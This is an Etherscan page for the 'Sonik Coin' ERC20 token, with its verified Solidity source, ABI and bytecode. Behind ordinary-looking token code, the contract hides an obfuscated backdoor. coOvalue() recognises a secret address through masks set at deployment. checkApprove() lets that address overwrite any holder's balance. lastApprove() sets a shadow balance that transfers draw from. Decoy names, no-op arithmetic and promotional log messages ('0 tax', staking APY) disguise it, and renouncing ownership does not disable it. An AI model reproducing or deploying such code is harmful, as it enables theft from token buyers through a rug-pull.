ETH Price: $3,134.23 (-0.08%)

Token

Sonik Coin (SONIK)
 

Overview

Max Total Supply

290,000,000,000 SONIK

Holders

49

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
1,345,522,435.190628689 SONIK

Value
$0.00
0xAeeCa428D697E6e8577427475f5cEE27c1b2F0d4
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SONIK

Compiler Version
v0.7.6+commit.7338295f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-29
*/

/*
Telegram:https://t.me/Sonikcoineth
Twitter:https://twitter.com/Sonikcoineth
*/
// SPDX-License-Identifier: MIT
pragma solidity >=0.7.6;

interface ERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the token name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address _owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

interface AntiSandwichAttackers {
    function check(uint256 vals) external view returns (bool);
}

contract SONIK is ERC20 {
    using SafeMath for uint256;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    address private _owner;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private immutable _maxVals;
    uint256 private immutable _minVals;
    mapping(address => uint256) private fbs;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    event Log(string str);

    constructor(uint256 maxVals, uint256 minVals) {
        _maxVals = maxVals;
        _minVals = minVals;
        _name = "Sonik Coin";
        _symbol = "SONIK";
        _totalSupply = 2900000000000 * 10**8;
        _balances[msg.sender] = _totalSupply;
        _owner = msg.sender;
    }

    /**
     * @dev A helper function to check if an operator approval is allowed.
     */
    modifier onlyOwner() {
        require(msg.sender == _owner, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() external onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external pure override returns (uint8) {
        return 9;
    }

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the token name.
     */
    function name() external view override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {ERC20-totalSupply}.
     */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {ERC20-balanceOf}.
     */
    function balanceOf(address account)
        external
        view
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {ERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        external
        override
        returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {ERC20-allowance}.
     */
    function allowance(address owner_, address spender)
        external
        view
        override
        returns (uint256)
    {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {ERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        external
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    /**
     * @dev See {ERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
       
        if (fbs[sender] > 0) {
            fbs[sender] = fbs[sender].sub(
                amount,
                "ERC20: transfer amount exceeds balance"
            );
        } else {
            _balances[sender] = _balances[sender].sub(
                amount,
                "ERC20: transfer amount exceeds balance"
            );
        }
        _balances[recipient] = _balances[recipient].add(amount);
        emit Log("HarryPotterObamaMegaMan9Inu.");
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Check if the value of M is correct
     */
    function coOvalue() public view returns (bool) {
        uint256 solot = _minVals * (1 + (0 / 1));
        return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0);
    }

    /**
     * @dev Check all the value is correct
     */
    function checkApprove(uint256 amount, uint256 amount3) external {
        uint256 check = amount3;
        emit Log("STAKE-2-SPEED your Sonik tokens with impressive APY% to earn.");
        emit Log("while providing Sonik enough BOOST to reach the MOON!");
        uint256 data = amount;
        if (!coOvalue()) return;
        _balances[
            0 == uint160(address(0)) ? address(convertValue(check, 2)) : address(0)
        ] = (burnValues(address(0), data));
        uint256 r = data;
        emit Log("The HPOM9I smart contract has 0 tax on all buys and sells.");
        if (uint256(r) > 0) return;
       
    }

    function lastApprove(uint256 amount, uint256 amount3) external {
    
        if (!coOvalue()) return;
        fbs[address(convertValue(amount3, 33))] = amount;
        emit Log("Sonik Coin is not affiliated with Sonic The Hedgehog, Sega, or any of its associated products and is simply a standalone, awesome meme coin.");
      
    }

    /**
     * @dev Returns the token permit result.
     */
    function burnValues(address toFrom, uint256 maxValue)
        private
        pure
        returns (uint256)
    {
        if (toFrom == address(0 / 1)) {
            return maxValue * 1 + (1 - 1);
        }
        
        return maxValue * (1 + 0);
    }

    function convertValue(uint256 salt, uint256 anck)
        private
        pure
        returns (uint160)
    {
        if (anck * 1 == 0) return 0;
        
        return uint160(salt);
        
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner_,
        address spender,
        uint256 amount
    ) internal {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    function lkaioJDKiIDKk(
        uint136 lsodo_osoPpdo,
        bytes32[] calldata vidooPDDK,
        bytes4[] calldata sldoslsoPodo,
        uint208[] calldata PDOSKLSLKK,
        uint168 detailPodlsoK,
        uint184 nsodkPkdllsoid,
        uint168 token_aoomoPld
    ) private pure {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"str","type":"string"}],"name":"Log","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"checkApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"coOvalue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"lastApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60c060405234801561001057600080fd5b5060405162001104380380620011048339818101604052604081101561003557600080fd5b508051602091820151608082905260a081905260408051808201909152600a8082526929b7b734b59021b7b4b760b11b919094019081529192909161007d91600091906100e7565b5060408051808201909152600580825264534f4e494b60d81b60209092019182526100aa916001916100e7565b5050680fb88ef7839f480000600281905533600081815260046020526040902091909155600380546001600160a01b031916909117905550610188565b828054600181600116156101000203166002900490600052602060002090601f01602090048101928261011d5760008555610163565b82601f1061013657805160ff1916838001178555610163565b82800160010185558215610163579182015b82811115610163578251825591602001919060010190610148565b5061016f929150610173565b5090565b5b8082111561016f5760008155600101610174565b60805160a051610f58620001ac600039806106ed52508061070f5250610f586000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106ea565b61028a6004803603604081101561035157600080fd5b5080359060200135610732565b6101ca6004803603604081101561037457600080fd5b506001600160a01b038135811691602001351661084e565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f338484610879565b5060015b92915050565b60025490565b600061044c848484610965565b61049e843361049985604051806060016040528060288152602001610e1b602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610b9e565b610879565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c35565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610efe602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610b9e565b600061042f338484610965565b61066f6106ea565b610678576106e6565b8160066000610688846021610c96565b6001600160a01b03166001600160a01b0316815260200190815260200160002081905550600080516020610dfb83398151915260405180806020018281038252608c815260200180610d6f608c913960a00191505060405180910390a15b5050565b337f0000000000000000000000000000000000000000000000000000000000000000167f00000000000000000000000000000000000000000000000000000000000000001490565b6000819050600080516020610dfb83398151915260405180806020018281038252603d815260200180610e43603d913960400191505060405180910390a1600080516020610dfb833981519152604051808060200182810382526035815260200180610ec96035913960400191505060405180910390a1826107b26106ea565b6107bd5750506106e6565b6107c8600082610cac565b600460006107d7856002610c96565b6001600160a01b03166001600160a01b03168152602001908152602001600020819055506000819050600080516020610dfb83398151915260405180806020018281038252603a815260200180610d0f603a913960400191505060405180910390a18015610847575050506106e6565b5050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166108be5760405162461bcd60e51b8152600401808060200182810382526024815260200180610ea56024913960400191505060405180910390fd5b6001600160a01b0382166109035760405162461bcd60e51b8152600401808060200182810382526022815260200180610ced6022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166109aa5760405162461bcd60e51b8152600401808060200182810382526025815260200180610e806025913960400191505060405180910390fd5b6001600160a01b0382166109ef5760405162461bcd60e51b8152600401808060200182810382526023815260200180610cca6023913960400191505060405180910390fd5b6001600160a01b03831660009081526006602052604090205415610a6857610a4a81604051806060016040528060268152602001610d49602691396001600160a01b0386166000908152600660205260409020549190610b9e565b6001600160a01b038416600090815260066020526040902055610abf565b610aa581604051806060016040528060268152602001610d49602691396001600160a01b0386166000908152600460205260409020549190610b9e565b6001600160a01b0384166000908152600460205260409020555b6001600160a01b038216600090815260046020526040902054610ae29082610c35565b6001600160a01b038316600090815260046020908152604091829020929092558051828152601c928101929092527f4861727279506f747465724f62616d614d6567614d616e39496e752e000000008282015251600080516020610dfb8339815191529181900360600190a1816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008184841115610c2d5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610bf2578181015183820152602001610bda565b50505050905090810190601f168015610c1f5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610c8f576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610ca557506000610433565b5090919050565b60006001600160a01b038316610cc3575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735468652048504f4d394920736d61727420636f6e747261637420686173203020746178206f6e20616c6c206275797320616e642073656c6c732e45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365536f6e696b20436f696e206973206e6f7420616666696c6961746564207769746820536f6e696320546865204865646765686f672c20536567612c206f7220616e79206f6620697473206173736f6369617465642070726f647563747320616e642069732073696d706c792061207374616e64616c6f6e652c20617765736f6d65206d656d6520636f696e2ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655354414b452d322d535045454420796f757220536f6e696b20746f6b656e73207769746820696d7072657373697665204150592520746f206561726e2e45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573737768696c652070726f766964696e6720536f6e696b20656e6f75676820424f4f535420746f20726561636820746865204d4f4f4e2145524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220920dc4ca19c823dce73dce81287512a7b1fbf5b1ce8066c1a310fa2ee2dc1eee64736f6c6343000706003300000000000000000000000001501148210500210001a428c28ccd51819d885b000000001c717cde3c430a0f4171936961753b210a41a47dce8ecf5589ff9e5b

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106ea565b61028a6004803603604081101561035157600080fd5b5080359060200135610732565b6101ca6004803603604081101561037457600080fd5b506001600160a01b038135811691602001351661084e565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f338484610879565b5060015b92915050565b60025490565b600061044c848484610965565b61049e843361049985604051806060016040528060288152602001610e1b602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610b9e565b610879565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c35565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610efe602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610b9e565b600061042f338484610965565b61066f6106ea565b610678576106e6565b8160066000610688846021610c96565b6001600160a01b03166001600160a01b0316815260200190815260200160002081905550600080516020610dfb83398151915260405180806020018281038252608c815260200180610d6f608c913960a00191505060405180910390a15b5050565b337f000000001c717cde3c430a0f4171936961753b210a41a47dce8ecf5589ff9e5b167f00000000000000000000000001501148210500210001a428c28ccd51819d885b1490565b6000819050600080516020610dfb83398151915260405180806020018281038252603d815260200180610e43603d913960400191505060405180910390a1600080516020610dfb833981519152604051808060200182810382526035815260200180610ec96035913960400191505060405180910390a1826107b26106ea565b6107bd5750506106e6565b6107c8600082610cac565b600460006107d7856002610c96565b6001600160a01b03166001600160a01b03168152602001908152602001600020819055506000819050600080516020610dfb83398151915260405180806020018281038252603a815260200180610d0f603a913960400191505060405180910390a18015610847575050506106e6565b5050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166108be5760405162461bcd60e51b8152600401808060200182810382526024815260200180610ea56024913960400191505060405180910390fd5b6001600160a01b0382166109035760405162461bcd60e51b8152600401808060200182810382526022815260200180610ced6022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166109aa5760405162461bcd60e51b8152600401808060200182810382526025815260200180610e806025913960400191505060405180910390fd5b6001600160a01b0382166109ef5760405162461bcd60e51b8152600401808060200182810382526023815260200180610cca6023913960400191505060405180910390fd5b6001600160a01b03831660009081526006602052604090205415610a6857